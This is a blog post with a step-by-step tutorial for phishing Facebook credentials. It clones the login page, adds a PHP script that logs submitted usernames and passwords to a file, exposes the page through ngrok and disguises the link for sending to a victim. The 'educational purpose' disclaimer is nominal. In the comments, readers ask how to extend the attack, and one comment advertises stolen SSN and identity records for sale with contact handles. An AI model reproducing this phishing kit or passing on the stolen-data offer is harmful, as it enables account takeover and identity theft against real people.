Monday, 17 April 2017

facebook phishing by xampp and ngrok


Note:this is for only educational purpose only.
today i m showing to how to hack facebook by phishing method...
first of all you need this software....

(1)xampp, you can download from official website:click here
(2)ngrok , for windows 32 bit  click here, for windows 64 bit  click here


now , let's start hacking...😎😋😋

first of all go to control panel  then find internet option ➔ security custom level➔ disable all active x control like below screen shot




after disabling all active x control go to original page of facebook:facebook
then right click and save as file name: index and make sure save type : complete webpage
now copy below code in notepad and save as data.php make sure extension is .php
code:

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

now put index.htm and data.php file in c:xampp/htdocs.
note:delete all files in htdocs if install first time u will see many files in htdocs so delete it.


now we have to open  index.htm as notepade then u will get source code of original page of facebook, press ctrl+f to find and type action=  will see this"https://www.facebook.com/login.php?login_attempt=1&amp;lwv=110"  replace this with data.php


now open xampp
start apache and mysql service

 then after start ngrok 
type :ngrok.exe http 80 then enter
u will see like this


u will see link http://784025b7.ngrok.io  send this link to vitcim and he redircted to facebook phishing page

if victim login then u can see password in xampp/ htdocs/ log.txt


i know u have question like every one thought is victim never login in this link http://784025b7.ngrok.io , 
 so i have solution for this
u can bind our link with other link

use this site to change our link  website: grabify ip logger click here 



note: use any vpn for safety, use cyberghost vpn  

note:this is only educational purpose only..


Posted by at

4 comments:

  1. Moula8 December 2019 at 06:41

    How do I get a php receiver email for email password

    ReplyDelete
  2. Unknown2 May 2020 at 00:14

    What can I do to keep the link active even if my pc is shut down

    ReplyDelete
  3. No Name22 September 2020 at 07:16

    Selling USA FRESH SSN Leads/Fullz, along with Driving License/ID Number with good connectivity.

    **Price for One SSN lead 2$**

    All SSN's are Tested & Verified. Fresh spammed data.

    **DETAILS IN LEADS/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL
    ->EMPLOYEE DETAILS

    ->Bulk order negotiable
    ->Hope for the long term business
    ->You can asked for specific states too

    **Contact 24/7**

    Whatsapp > +923172721122

    Email > leads.sellers1212@gmail.com

    Telegram > @leadsupplier

    ICQ > 752822040

    ReplyDelete
  4. Unknown17 December 2020 at 18:28

    what if google chrome secured the victims login and prevent victims from login?

    ReplyDelete

Subscribe to: Post Comments (Atom)